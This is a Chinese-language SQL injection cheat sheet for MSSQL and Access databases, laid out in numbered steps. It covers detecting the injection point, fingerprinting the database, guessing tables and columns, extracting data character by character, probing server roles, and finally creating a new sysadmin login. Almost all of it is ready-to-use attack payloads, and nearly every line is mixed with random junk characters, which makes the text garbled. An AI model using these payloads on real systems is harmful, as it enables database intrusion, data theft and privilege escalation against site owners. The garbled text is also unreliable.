1.判断是否有注入;and 1=1 ;and 1=2 oP~%7Jt
2.初步判断是否是mssql ;and user>0 %6\L^RP
LNcoTdv}k
3.注入参数是字符'and [查询条件] and ''=' 9zl-C*9vj
MbxJ3"@
4.搜索时没过滤参数的'and [查询条件] and '%25'=' $px1D$F !
_Un*x5u2O
5.判断数据库系统 ?f= ~Pn+
CC)Mws+2
;and (select count(*) from sysobjects)>0 mssql VpX*l3
j^.|^q<Y
;and (select count(*) from msysobjects)>0 access ''($E/
xwub-yz
RK/>5
:}-VLp4b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 OP|X-
IdoS6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 !5
?<QKOe
?)g [Xc;K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 <m/XGFc
_6m{zvyX>
9.(1)猜字段的ascii值(access) @6M>x=n5
[9d\WPLC
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;OC{B}.vH
MU4BAN
(2)猜字段的ascii值(mssql) 87F]a3
NIAji3
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 G\R6=K:f7
%?3$~d\n
10.测试权限结构(mssql) jx'hxC'3
0a9[}g1=#
l{QlJ>%~{;
5Y 7 %Z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- m2HO .ljc
OaKr_m
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +7{8T{
oT|:gih5
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @~&|BvK% \
M< H+$}[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 'U,\5jj'Y
\!"3yd
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- sf
O{.#5<
]E.\ |I(
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- {Y3:Y+2X3*
Y.q$"lm7k
;and 1=(select IS_MEMBER('db_owner'));-- cqaq~
OepQ Z|2
<sn,X0W
PZY6
I
11.添加mssql和系统的帐户 X/buz
r?9".H
;exec master.dbo.sp_addlogin username;-- 3e>U(ES
;exec master.dbo.sp_password null,username,password;-- e~SRGyIww
,Iru_=Wk~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3lbGG42:
:)y3&